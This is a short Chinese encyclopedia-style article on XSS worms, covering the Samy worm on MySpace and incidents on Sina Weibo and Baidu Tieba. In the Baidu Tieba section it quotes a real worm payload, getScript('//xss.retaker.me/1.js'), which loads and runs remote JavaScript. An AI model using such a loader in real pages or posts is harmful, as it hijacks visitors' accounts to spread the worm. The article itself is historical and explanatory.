# XSS蠕虫
xss蠕虫（cross site scripting worm）是一种跨站病毒，通常由脚本语言Javascript写成，它借由网站访问者传播

## 历史
历史第一个XSS蠕虫是针对网站Myspace的Samy，它在20小时内感染了100万个账户，作者Samy Kamkar之后被起诉

### 新浪微博
见对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

### 百度贴吧
2013年5月19日，  百度贴吧转帖功能再度出现xss漏洞，大量贴吧内充斥接近满版面，  包含代码getScript（'//xss.retaker.me/1.js'）为标题的帖子，当已登陆用户打开这样的帖子，用户所持账户便以相同方式在多个贴吧转帖原作者的帖，部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染  
2014年3月9日，  百度贴吧转帖功能再度出现xss漏洞

## 性质
由于XSS蠕虫基于浏览器而不是操作系统，取决于其依赖网站的规模，它可以在短时间内达到对巨大数量的计算机感染